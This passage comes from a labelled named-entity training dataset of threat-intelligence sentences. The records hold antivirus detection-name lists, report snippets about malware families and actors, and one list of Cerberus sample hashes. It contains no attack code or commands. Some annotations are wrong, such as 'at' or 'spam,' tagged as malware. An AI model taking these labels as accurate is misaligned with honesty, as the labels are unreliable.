BehavesLike.Win32.Virus.dh Backdoor.Win32.IRCBot Trojan/Kargatroj.e WORM/Autorun.Agr.3 Trojan/Win32.Kargatroj Backdoor:Win32/Deppeels.A Trojan.Win32.Kargatroj.a Trojan/Win32.Kargatroj.R50492 Trojan.Kargatroj Trojan.Kargatroj!+VQ4l8zO8kI", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007416", "source": "cyner2_train"}} {"text": "We refer to this utility as BOOTRASH.", "spans": {"MALWARE: BOOTRASH.": [[28, 37]]}, "info": {"id": "cyner2_train_007417", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.W.Fujack.lmEa Trojan.Dropper Win.Trojan.Packed-24 Trojan.Win32.Baidu.iidnc Trojan.Win32.A.PSW-Magania.1913020.A Trojan/Win32.Zegost Trojan.Zusy.D88F TrojanDropper:Win32/Demekaf.A Trojan.MalPack.NSPack Win32/TrojanDropper.Demekaf.A Trojan.Win32.Jorik W32/Obfuscated.AAAD!tr Win32/Trojan.4b9", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007419", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Dropper/W32.Hirhir.2779437 TrojanDropper.Hirhir.20 Trojan/Dropper.Hirhir.20 Trojan-Dropper.Win32.Hirhir.20 Win32/TrojanDropper.Hirhir.20 W32/Hirhir.A Trojan.Dropper W32/Smalldrp.BTL Win32.Dropper.Hirhir Trojan.Dropper-1156 Trojan-Dropper.Win32.Hirhir.20 Trojan.Dropper.Hirhir.2.0 TrojWare.Win32.TrojanDropper.Hirhir.20 Trojan.Dropper.Hirhir.2.0 Trojan.MulDrop.1734 TR/Drop.Hirhir.20.5 TROJ_HIRHIR.20 Trojan.Drop.Hirhir.20.5 Win32/DigitalM.10 W32/Hirhir.A TrojanDropper.Dmexeb.10 Trojan-Dropper.Win32.Hirhir.20!IK TrojanDropper:Win32/Hirhir.2_0 Trojan.Win32.Hirhir.2164429 Trojan.Dropper.Hirhir.2.0 Dropper/Hirhir.11776 Win32.TrojanDropper.Hirhir.20 Trojan.DR.Hirhir.H Trojan.Dmexeb.10 Trojan-Dropper.Win32.Hirhir.20 W32/Hirhir.A!tr.dr Dropper.Hirhir Trj/Hirhir.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007423", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.FamVT.ExpiroPC.PE TROJ_ZYX_BK083A77.TOMC Heur.Corrupt.PE TROJ_ZYX_BK083A77.TOMC 
Trojan-Downloader.Win32.Vorloma TrojanDownloader:Win32/Vorloma.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007427", "source": "cyner2_train"}} {"text": "A backdoor also known as: PE:Trojan.Win32.Xcomp.a!1075128424 Heur.Packed.MultiPacked DDoS.Rincux Backdoor.Httpbot.Win32.799 BehavesLike.Win32.Trojan.cz Backdoor:Win32/Luder.H Trojan/Win32.Injector Virus.Win32.Heur.c Trj/CI.A Packed.Win32.PolyCrypt Trojan.Win32.Downloader.aC", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007429", "source": "cyner2_train"}} {"text": "The specific points of connection between these new samples and Operation Blockbuster include: payloads delivered by the macros discussed in Operation Blockbuster Sequel", "spans": {"THREAT_ACTOR: Operation Blockbuster": [[64, 85]], "MALWARE: payloads": [[95, 103]], "MALWARE: macros": [[121, 127]], "THREAT_ACTOR: Operation Blockbuster Sequel": [[141, 169]]}, "info": {"id": "cyner2_train_007430", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.ADH.2 Win.Trojan.Mediyes-1761 Trojan.Hosts.5806 Trojan.VBCRTD.Win32.7945 Trojan:Win32/Mediyes.C Trojan.Pirminay Trojan.Win32.Mediyes", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007431", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Aimaster.A Backdoor/W32.Aimaster.49152 Backdoor.Aimmaster Backdoor.RAT.Aimaster Backdoor.Trojan Win32/Aimaster.A BKDR_AIMASTER.A Win.Trojan.Aimaster-4 Backdoor.Win32.Aimaster Backdoor.Aimaster.A Trojan.Win32.Aimaster-Bd.fdhc Win32.Backdoor.Aimaster.Ahyt Backdoor.Aimaster.A Backdoor.Win32.Aimaster.A Backdoor.Aimaster.A BackDoor.Master.10 BackDoor-XT.svr W32/Risk.FHHV-3782 BDS/Aimaster.B W32/Aimaste.A!tr.bdr Trojan[Backdoor]/Win32.Aimaster Backdoor.Aimaster.A Backdoor.W32.Aimaster!c Backdoor.Win32.Aimaster Trojan/Win32.Aimaster.C662411 BackDoor-XT.svr Backdoor.Aimaster Backdoor.Aimaster!2o1TvHIl4Fg Backdoor.Aimaster.A Win32/Backdoor.IM.d95", "spans": 
{"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007432", "source": "cyner2_train"}} {"text": "The data available in the leaked Hacking Team files provides circumstantial evidence pointing to an interest in compromising individuals with ties to South Korea i.e., Korean language speakers who use software or apps popular in South Korea, or South Korean editions of Samsung phones.", "spans": {"ORGANIZATION: Hacking Team": [[33, 45]], "SYSTEM: software": [[201, 209]], "SYSTEM: apps": [[213, 217]], "SYSTEM: Samsung phones.": [[270, 285]]}, "info": {"id": "cyner2_train_007433", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor/W32.Amitis.827392 Backdoor.Amitis!GgBFlh0m/G4 W32/Amitis.MXVV-8538 Backdoor.Amitis Win32/Amitis.13 BKDR_AMITIS.B Trojan.Amitis.13-B Backdoor.Win32.Amitis.13 Trojan.Win32.Amitis.dbhy Backdoor.Win32.S.Amitis.827392.A[h] Backdoor.W32.Amitis.13!c Backdoor.Win32.Amitis.13 BackDoor.Amitist.13 Backdoor.Amitis.Win32.17 BKDR_AMITIS.B BehavesLike.Win32.Downloader.ch W32/Amitis.N@bd Backdoor/Amitis.p W32/Amitis.C!tr Trojan[Backdoor]/Win32.Amitis Win-Trojan/Amitis.827392 Backdoor:Win32/Amitis.1_3 Win32/Amitis.13 Backdoor.Amitis Win32.Backdoor.Amitis.Akfc Backdoor.Win32.Amitis BackDoor.Amitis.G Backdoor.Win32.Amitis.13", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007434", "source": "cyner2_train"}} {"text": "A backdoor also known as: HackTool.Patcher Backdoor.RBot.Win32.54805 Troj.GameThief.W32.Magania.lHhM Multi.Threats.InArchive W32.Pilleuz Win.Worm.Mytob-399 Trojan.Win32.Rbot.bhwabq Heur.Packed.Unknown Win32.HLLW.MyBot.based Trojan[Backdoor]/Win32.Rbot Trojan/Win32.Malco.R7515 Trj/CI.A Win32.Viking.BJ Backdoor.Win32.Rbot", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007435", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.Mlw.ewdlbx TR/Dropper.lusig Trojan.Win32.Eightow Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": 
"cyner2_train_007436", "source": "cyner2_train"}} {"text": "Though Orcus has all the typical features of RAT malware, it allows users to build custom plugins and also has a modular architecture for better management and scalability.", "spans": {"MALWARE: Orcus": [[7, 12]], "MALWARE: RAT malware,": [[45, 57]], "SYSTEM: architecture": [[121, 133]]}, "info": {"id": "cyner2_train_007437", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Worm.SdDrop.C Worm.Sddrop W32/Sddrop.worm.c!p2p Win32.Worm.SdDrop.C Win32.Trojan.WisdomEyes.16070401.9500.9999 W32.Kwbot.Worm Unix.Tool.IRC-1 Win32.Worm.SdDrop.C P2P-Worm.Win32.SdDrop.c Win32.Worm.SdDrop.C Trojan.Win32.SdDrop.entp W32.W.SdDrop.c!c Win32.Worm.SdDrop.C Win32.Worm.SdDrop.C Win32.SdDrop.3 Worm.SdDrop.Win32.21 W32/Sddrop.worm.c!p2p Backdoor.Win32.SdBot I-Worm/P2P.SdDrop.c BDS/Sdbot.AA Worm[P2P]/Win32.SdDrop Worm:Win32/Sddrop.C P2P-Worm.Win32.SdDrop.c Trojan/Win32.HDC.C38855 Win32.Worm.SdDrop.C Backdoor.Sdbot Trj/CI.A Worm.SdDrop Win32/Sddrop.C Win32.Worm-p2p.Sddrop.Lknd Worm.P2P.SdDrop!LrfriCz8zKY W32/KWBot.E!worm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007438", "source": "cyner2_train"}} {"text": "Recently, the FortiGuard Labs research team observed that a new variant of Poison Ivy was being spread through a compromised PowerPoint file.", "spans": {"ORGANIZATION: FortiGuard Labs research team": [[14, 43]], "MALWARE: new variant of Poison Ivy": [[60, 85]]}, "info": {"id": "cyner2_train_007439", "source": "cyner2_train"}} {"text": "Many victims have discussed YiSpecter infections of their jailbroken and non-jailbroken iPhones in online forums and have reported the activity to Apple.", "spans": {"MALWARE: YiSpecter": [[28, 37]], "SYSTEM: jailbroken": [[58, 68]], "SYSTEM: non-jailbroken iPhones": [[73, 95]], "ORGANIZATION: Apple.": [[147, 153]]}, "info": {"id": "cyner2_train_007440", "source": "cyner2_train"}} {"text": "The campaign operated out of handful of IPs, but we 
ended up finding in excess of 80K malicious subdomains associated with more than 500 domains leveraging various registrant accounts.", "spans": {"THREAT_ACTOR: campaign": [[4, 12]]}, "info": {"id": "cyner2_train_007443", "source": "cyner2_train"}} {"text": "A backdoor also known as: Udsdangerousobject.Multi TROJ_DLOADR.YLP TROJ_DLOADR.YLP Trojan.Win32.Dwn.dcbaru Trojan.Win32.Z.Tapaoux.49152 Trojan.DownLoader11.19325 W32/Trojan.FALA-2329 TR/Rogue.icdl Trojan.DownLoader! Trojan.Rogue", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007444", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.MSIL.Bladabindi.1 Win32.Trojan.WisdomEyes.16070401.9500.9922 Trojan.Win32.Bladabindi.etjjte Trojan.Win32.Z.Clicker.90624 Trojan.Win32.Clicker!BT BehavesLike.Win32.PWSZbot.mm Trojan.Win32.Clicker!BT Trj/Chgt.O Win32.Outbreak", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007445", "source": "cyner2_train"}} {"text": "The file size of the malware is mostly around ~50Kb, as you can see from the list of sample hashes at the end of this report.", "spans": {"MALWARE: malware": [[21, 28]], "MALWARE: sample": [[85, 91]]}, "info": {"id": "cyner2_train_007448", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.YahooPass.Spyware Backdoor.Win32.Bredavi!O Backdoor.Bredavi.Win32.215 Backdoor.W32.Bredavi.kYWA Backdoor/Bredavi.le Win32.Trojan-PSW.Yahoo.a Backdoor.Trojan Win32/Bredolab.PS Win.Trojan.Bredolab-1635 Trojan.Win32.Krap.ihir Backdoor.Win32.Bredavi.348960 Application.Win32.Adware.Superjuan.~JAJ Trojan.BhoSpy.97 Trojan.Win32.Glecia Backdoor/Bredavi.bf BDS/Glecia.A Trojan[Backdoor]/Win32.Bredavi Adware.Heur.E51E88 Trojan/Win32.Bredavi.C83160 Backdoor.Bredavi Trj/Sinowal.WNX Win32/PSW.YahooPass.NAD", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007451", "source": "cyner2_train"}} {"text": "A backdoor also known as: Email-Worm.Win32.Scano!O W32/Scano.bm WORM_SCANO.BT 
Win32.Worm.Scano.a W32.Areses.P@mm WORM_SCANO.BT Win.Worm.Scano-70 Email-Worm.Win32.Scano.bm Trojan.Win32.LdPinch.fmye I-Worm.Win32.A.Scano.105231 W32.W.Otwycal.l7h6 Win32.HLLM.Perf Worm.Scano.Win32.69 BehavesLike.Win32.Autorun.cm Email-Worm.Win32.Scano Worm/Scano.at W32.Worm.Areses Worm[Email]/Win32.Scano Email-Worm.Win32.Scano.bm Worm/Win32.Scano.R1851 BScope.Trojan-Dropper.Injector Win32/Scano.BM I-Worm.Scano!zrLOU/XMrws W32/Scano.AA@mm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007452", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Fsysna Win32.Trojan.WisdomEyes.16070401.9500.9969 Trojan.Win32.Fsysna.eqvl Trojan.Win32.Z.Strictor.607232.C Trojan.MulDrop7.49159 Trojan.Fsysna.Win32.15357 Trojan.MSIL.Spy TrojanSpy:MSIL/Logadat.A Trojan.Win32.Fsysna.eqvl Trojan.Fsysna Trj/GdSda.A Win32.Trojan.Fsysna.Lqym", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007453", "source": "cyner2_train"}} {"text": "The report includes extra detail to help potential targets recognize similar attacks.", "spans": {}, "info": {"id": "cyner2_train_007454", "source": "cyner2_train"}} {"text": "ThreatStream Labs recently became aware of a campaign beginning on 30 June 2015 by the omniprescent Wekby threat actors a/k/a TG-0416, APT-18, Dynamite Panda.", "spans": {"ORGANIZATION: ThreatStream Labs": [[0, 17]], "THREAT_ACTOR: campaign": [[45, 53]], "THREAT_ACTOR: Wekby": [[100, 105]], "THREAT_ACTOR: TG-0416, APT-18, Dynamite Panda.": [[126, 158]]}, "info": {"id": "cyner2_train_007455", "source": "cyner2_train"}} {"text": "Adding this extra layer of filtering may help the group focus on targets of interest and evade detection due to use of known malware.", "spans": {"THREAT_ACTOR: group": [[50, 55]], "MALWARE: malware.": [[125, 133]]}, "info": {"id": "cyner2_train_007457", "source": "cyner2_train"}} {"text": "A backdoor also known as: W97M.Downloader TROJ_CVE201711882.E Exploit.Xml.CVE-2017-0199.equmby 
Xml.Exploit.Cve!c TROJ_CVE201711882.E Malicious_Behavior.SB DOC.S.Exploit.11442 XML/Dloader.S1 Exploit.CVE-2017-0199 XML.Exploit.CVE-2017-0199.E", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007458", "source": "cyner2_train"}} {"text": "It was a standalone utility with the name HDD Rootkit for planting a bootkit on a computer.", "spans": {"SYSTEM: standalone utility": [[9, 27]], "MALWARE: bootkit": [[69, 76]], "SYSTEM: computer.": [[82, 91]]}, "info": {"id": "cyner2_train_007460", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32/Goft.B Trojan.Win32.cvrsqp.eaqdwq Trojan.MyRunner BehavesLike.Win32.PWSZbot.nc Virus.Win32.AA Trojan/PSW.QQPass.fx Trojan/Win32.QQTail.R5474", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007461", "source": "cyner2_train"}} {"text": "It provides the same functionality you would expect from a remote access tool: keylogging, webcam access, microphone access, remote desktop, URL download, program execution, etc.", "spans": {"MALWARE: remote access tool:": [[59, 78]]}, "info": {"id": "cyner2_train_007462", "source": "cyner2_train"}} {"text": "Attacks that use completely fileless malware are a rare occurrence, so we thought it important to discuss a new trojan known as JS_POWMET Detected by Trend Micro as JS_POWMET.DE, which arrives via an autostart registry procedure.", "spans": {"MALWARE: fileless malware": [[28, 44]], "MALWARE: new trojan": [[108, 118]], "MALWARE: JS_POWMET": [[128, 137]], "ORGANIZATION: Trend Micro": [[150, 161]]}, "info": {"id": "cyner2_train_007463", "source": "cyner2_train"}} {"text": "As you can see in the sample list below, this means that many school employees will have received this spam, as K-12 schools very commonly use .us domain names.", "spans": {"ORGANIZATION: school employees": [[62, 78]], "MALWARE: spam,": [[103, 108]]}, "info": {"id": "cyner2_train_007464", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Vetor.PE 
Virus.Win32.Virut.1!O W32.Virut.G PE_VIRUX.R W32/Virut.AM Win32/Virut.17408 Trojan.Scar PE_VIRUX.R Win.Trojan.Virtob-1456 Win32.Virus.Virut.U Virus.Win32.Virut.ce Virus.Win32.Virut.hpeg Virus.Win32.Virut.CE Win32.Virut.56 Virus.Virut.Win32.1938 BehavesLike.Win32.Virut.qh W32/Virut.AM Virus/Win32.Virut.ce Win32.Virut.dd.368640 W32.Virut.lqR9 Virus.Win32.Virut.ce Trojan:Win32/QHosts.BR Win32/Virut.F Virus.Virut.14 W32/Sality.AO Win32/Virut.NBP Trojan.Win32.Downloader.toh Trojan.Win32.Scar Virus.Win32.VirutChangeEntry.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007465", "source": "cyner2_train"}} {"text": "All of these attacks leveraged CVE-2014-4114 and were delivered via malicious Microsoft PowerPoint Slideshow files *.pps.", "spans": {"SYSTEM: Microsoft PowerPoint Slideshow files": [[78, 114]]}, "info": {"id": "cyner2_train_007468", "source": "cyner2_train"}} {"text": "Brambul and Joanap appear to be used to download extra payloads and carry out reconnaissance on infected computers.", "spans": {"MALWARE: Brambul": [[0, 7]], "MALWARE: Joanap": [[12, 18]], "SYSTEM: infected computers.": [[96, 115]]}, "info": {"id": "cyner2_train_007469", "source": "cyner2_train"}} {"text": "A backdoor also known as: Packed.Win32.Tibs!O Worm.Zhelatin Trojan.Heur.RP.fqWcaaXp5um Win32.Trojan.WisdomEyes.16070401.9500.9882 W32/Trojan.LQOD-4441 Trojan.Dropper Email-Worm.Win32.Zhelatin.rn Trojan.Win32.Z.Zhelatin.88576 MalCrypt.Indus! 
Trojan.Spambot.2559 Email.Worm.W32!c Email-Worm.Win32.Zhelatin.rn Worm/Win32.Zhelatin.R38109 BScope.Trojan.Zhelatin.12 Trj/CI.A Win32/Nuwar.BH Win32.Worm-email.Zhelatin.Sxxs Worm.Win32.Nuwar Win32/Worm.Email-Worm.43d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007473", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Rustock.NDU Backdoor.Win32.Rbot!O Backdoor.Rustock.NDU Backdoor.Rbot Win32.Trojan.WisdomEyes.16070401.9500.9989 W32/Trojan.TDBQ-4167 Backdoor.Rustock.B Win.Trojan.Crypt-278 Backdoor.Rustock.NDU Backdoor.Win32.Rbot.szn Backdoor.Rustock.NDU Backdoor.Win32.A.Rbot.70656.J Backdoor.Rustock.NDU Backdoor.Rustock.NDU Trojan.Fakealert.33205 BehavesLike.Win32.Downloader.kt Rootkit.KernelBot.m TR/Tiny.705 Backdoor.Rustock.NDU Backdoor.Win32.Rbot.szn Trojan:Win32/Silentbanker.B Worm/Win32.IRCBot.C36854 Backdoor.Rbot Trj/CI.A Win32.Backdoor.Rbot.Aiik Virus.Win32.Virut.n W32/RBot.SZN!tr.bdr Win32/Backdoor.0a5", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007475", "source": "cyner2_train"}} {"text": "During a recent United States Secret Service investigation, Trustwave encountered a new family of POS malware, that we named Punkey.", "spans": {"ORGANIZATION: United States Secret Service": [[16, 44]], "ORGANIZATION: Trustwave": [[60, 69]], "MALWARE: POS malware,": [[98, 110]], "MALWARE: Punkey.": [[125, 132]]}, "info": {"id": "cyner2_train_007476", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.FakeAV.29696.H Backdoor.Ziyazo Trojan.Graftor.D21706 TROJ_FAKEAV.ORH Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Trojan.B TROJ_FAKEAV.ORH Win.Trojan.Ziyazo-1 Trojan.Win32.FakeAv.cuscpt Troj.W32.FakeAv.rxda!c Trojan.Fakealert.45728 Trojan.FakeAV.Win32.293288 BehavesLike.Win32.Backdoor.mc W32/Trojan.TSSV-1630 Trojan/Fakeav.blva Trojan/Win32.FakeAv Backdoor:Win32/Ziyazo.A Trojan/Win32.FakeAV.R94861 Trj/Dynamer.A Trojan.FakeAv!73pMuD6/3rE Trojan.Win32.FakeAV 
W32/FakeAv.RXDA!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007477", "source": "cyner2_train"}} {"text": "Subsequent to the publishing of this article, through cooperation with the parties responsible for the C2 domains, Unit 42 researchers successfully gained control of multiple C2 domains.", "spans": {"ORGANIZATION: Unit 42 researchers": [[115, 134]]}, "info": {"id": "cyner2_train_007478", "source": "cyner2_train"}} {"text": "A backdoor also known as: Hacktool.Superscan Trojan.Win32.XFMP5368.dfvidz HackTool:Win32/SuperScan.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007480", "source": "cyner2_train"}} {"text": "Lurk was believed to have siphoned over $45 million from financial organizations, ultimately disrupting the victims' operations, reputation, and bottom line.", "spans": {"THREAT_ACTOR: Lurk": [[0, 4]], "ORGANIZATION: financial organizations,": [[57, 81]], "ORGANIZATION: operations,": [[117, 128]]}, "info": {"id": "cyner2_train_007481", "source": "cyner2_train"}} {"text": "While Empire RIG-E disappeared at the end of December after 4 months of activity on 2017-02-17 an advert for a new exploit kit dubbed Nebula appeared underground.", "spans": {"MALWARE: Empire RIG-E": [[6, 18]], "MALWARE: at": [[31, 33]], "MALWARE: a new exploit kit": [[109, 126]], "MALWARE: Nebula": [[134, 140]]}, "info": {"id": "cyner2_train_007482", "source": "cyner2_train"}} {"text": "A powerful threat actor known as Wild Neutron also known as Jripbot and Morpho has been active since at least 2011, infecting high profile companies for several years by using a combination of exploits, watering holes and multi-platform malware.", "spans": {"THREAT_ACTOR: powerful threat actor": [[2, 23]], "THREAT_ACTOR: Wild Neutron": [[33, 45]], "THREAT_ACTOR: Jripbot": [[60, 67]], "THREAT_ACTOR: Morpho": [[72, 78]], "ORGANIZATION: high profile companies": [[126, 148]], "MALWARE: exploits, watering holes": [[193, 217]], "MALWARE: 
multi-platform malware.": [[222, 245]]}, "info": {"id": "cyner2_train_007483", "source": "cyner2_train"}} {"text": "A backdoor also known as: Application.Hacktool.Pipecmd.B HackTool.Pipecmd Win32.HackTool.Pipecmd.a Application.Hacktool.Pipecmd.B Application.Hacktool.Pipecmd.B Application.Hacktool.Pipecmd.B Trojan.Starter.5008 BehavesLike.Win32.PUP.lc Application.Hacktool.Pipecmd.B Trojan/Win32.Inject.C500093", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007486", "source": "cyner2_train"}} {"text": "Following a three-month hiatus, Emotet spam activities resumed in March 2023, when a botnet known as Epoch 4 began delivering malicious documents embedded in Zip files that were attached to the emails.", "spans": {"MALWARE: Emotet": [[32, 38]], "MALWARE: botnet": [[85, 91]], "MALWARE: Epoch 4": [[101, 108]]}, "info": {"id": "cyner2_train_007488", "source": "cyner2_train"}} {"text": "A backdoor also known as: Ransom.Sage.S1609000 Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Trojan.TNMG-4793 Ransom.Cry Trojan.Win32.Yakes.etrgag BehavesLike.Win32.Ramnit.fc TR/AD.MalwareCrypter.zdeue Trojan.Zusy.D3FCFB Trojan/Win32.Yakes.C2201035 Trojan.Yakes Trojan.Yakes!KiOJwMzaTlA", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007489", "source": "cyner2_train"}} {"text": "Bots can use various methods to establish a line of communication between themselves and their command-and-control C C server.", "spans": {"MALWARE: Bots": [[0, 4]]}, "info": {"id": "cyner2_train_007490", "source": "cyner2_train"}} {"text": "Knowledge of the threat landscape and implementation of the right detection tools remains crucial to be able to protect yourself from fraud ; Cerberus is yet a new Trojan active in the wild ! 
Appendix Samples Some of the latest Cerberus samples found in the wild : App name Package name SHA 256 hash Flash Player com.uxlgtsvfdc.zipvwntdy 728a6ea44aab94a2d0ebbccbf0c1b4a93fbd9efa8813c19a88d368d6a46b4f4f Flash Player com.ognbsfhszj.hqpquokjdp fe28aba6a942b6713d7142117afdf70f5e731c56eff8956ecdb40cdc28c7c329 Flash Player com.mwmnfwt.arhkrgajn ffa5ac3460998e7b9856fc136ebcd112196c3abf24816ccab1fbae11eae4954c Flash Player com.wogdjywtwq.oiofvpzpxyo 6ac7e7ed83b4b57cc4d28f14308d69d062d29a544bbde0856d5697b0fc50cde4 Flash Player com.hvdnaiujzwo.fovzeukzywfr cfd77ddc5c1ebb8498c899a68ea75d2616c1c92a0e618113d7c9e5fcc650094b Flash Player com.gzhlubw.pmevdiexmn 3f2ed928789c200e21fd0c2095619a346f75d84f76f1e54a8b3153385850ea63 Target list The actual observed list of mobile apps targeted by Cerberus contains a total of 30 unique applications .", "spans": {"MALWARE: Cerberus": [[142, 150], [228, 236], [984, 992]], "SYSTEM: Flash Player": [[300, 312], [403, 415], [507, 519], [607, 619], [712, 724], [819, 831]]}, "info": {"id": "cyner2_train_007491", "source": "cyner2_train"}} {"text": "CVE-2015-5122 was the second Adobe Flash zero-day revealed in the leak of HackingTeam's internal data.", "spans": {"SYSTEM: Adobe Flash": [[29, 40]], "VULNERABILITY: zero-day": [[41, 49]], "ORGANIZATION: HackingTeam's": [[74, 87]]}, "info": {"id": "cyner2_train_007492", "source": "cyner2_train"}} {"text": "At the peak of procrastinators filing their taxes at the last minute, those who send in their tax forms are exactly the technically less-sophisticated users these kinds of campaigns target.", "spans": {}, "info": {"id": "cyner2_train_007493", "source": "cyner2_train"}} {"text": "A backdoor also known as: Worm/W32.Vesenlosow.1237156 Worm.Vesenlosow Worm.VB.Win32.13725 W32.W.Vesenlosow.luZW Trojan/VB.nzt WORM_VESENLO.SMA Win32.Worm.VB.m W32.Winiga WORM_VESENLO.SMA Trojan.Win32.Vesenlosow.bclidy Worm.Win32.A.Vesenlosow.909312 Trojan.MulDrop3.6950 BehavesLike.Win32.Rontokbro.tm Trojan.Win32.VB 
Worm/Vesenlosow.q WORM/VB.argu Trojan/Win32.VB Worm:Win32/Vesenlosow.A Trojan/Win32.VB.R46099 Trojan.Keylogger.1021 W32/Vobfus.GEP.worm Win32.Virut.NBP Win32/VB.NZT Win32.Worm.Vb.Akzk Worm.Win32.Msmm.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007495", "source": "cyner2_train"}} {"text": "A backdoor also known as: VB:Trojan.Valyria.1034 VBS/Downldr.IA W97M.Dropper TROJ_RUBREG.SM VB:Trojan.Valyria.1034 Trojan.Script.ExpKit.evbkht Troj.Downloader.Script!c VB:Trojan.Valyria.1034 VB:Trojan.Valyria.1034 VBS.DownLoader.1040 TROJ_RUBREG.SM VBS/Downloader.ea VBS/Downldr.IA TrojanDownloader:VBS/Vibrio.P VB:Trojan.Valyria.D40A VBS/Downloader.ea virus.vbs.houdini.b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007496", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.Mydse!O TrojanDropper.Goriadu Win32.Trojan.WisdomEyes.16070401.9500.9578 TROJ_GORIADU.SMX Trojan.Win32.Mydse.az Trojan.Win32.Click.tdtvg TROJ_GORIADU.SMX BehavesLike.Win32.BadFile.fh Trojan-Clicker.ANTO TR/Clicker.9984610 Win32.Troj.AntiCloudAV.d.kcloud TrojanDropper:Win32/Goriadu.A!bit Trojan.Zusy.D38CD Trojan.Win32.Mydse.az W32/GORIADU.SMX!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007497", "source": "cyner2_train"}} {"text": "Who is affected ? 
Gooligan potentially affects devices on Android 4 ( Jelly Bean , KitKat ) and 5 ( Lollipop ) , which is over 74 % of in-market devices today .", "spans": {"MALWARE: Gooligan": [[18, 26]], "SYSTEM: Android 4 ( Jelly Bean , KitKat ) and 5 ( Lollipop )": [[58, 110]]}, "info": {"id": "cyner2_train_007498", "source": "cyner2_train"}} {"text": "Figure 1 shows embedded URL in an Elirks sample found in early 2016.", "spans": {"MALWARE: Elirks": [[34, 40]]}, "info": {"id": "cyner2_train_007500", "source": "cyner2_train"}} {"text": "This malware is well-known for its ability to steal credentials and quickly spread through an enterprise over network shares.", "spans": {"MALWARE: malware": [[5, 12]], "ORGANIZATION: enterprise": [[94, 104]], "SYSTEM: network shares.": [[110, 125]]}, "info": {"id": "cyner2_train_007501", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.eHeur.Virus02 Adware.Heur.E101B3 Win32.Trojan.BHO.r Trojan.Win32.BHO.bropxr Adware.Softomate.603 Trojan:Win32/Jifcapi.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007502", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Kromebit TROJ_KROMEBIT.SM Win32.Trojan.WisdomEyes.16070401.9500.9982 TROJ_KROMEBIT.SM Trojan.Win32.Dwn.eurwpx Trojan.Win32.Z.Kromebit.1068032 Trojan.DownLoader25.50889 BehavesLike.Win32.Dropper.tt W32/Trojan.EJDN-0785 Trojan:Win32/Kromebit.B Trj/CI.A Trojan.Win32.Kromebit W32/KROMEBIT.SM!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007503", "source": "cyner2_train"}} {"text": "The report closes with some security suggestions, highlighting the importance of two-factor authentication.", "spans": {"SYSTEM: two-factor authentication.": [[81, 107]]}, "info": {"id": "cyner2_train_007505", "source": "cyner2_train"}} {"text": "This week the spam party did not just include CERBER, but also decided to invite an old friend – the KOVTER family.", "spans": {"MALWARE: CERBER,": [[46, 53]], "MALWARE: the KOVTER 
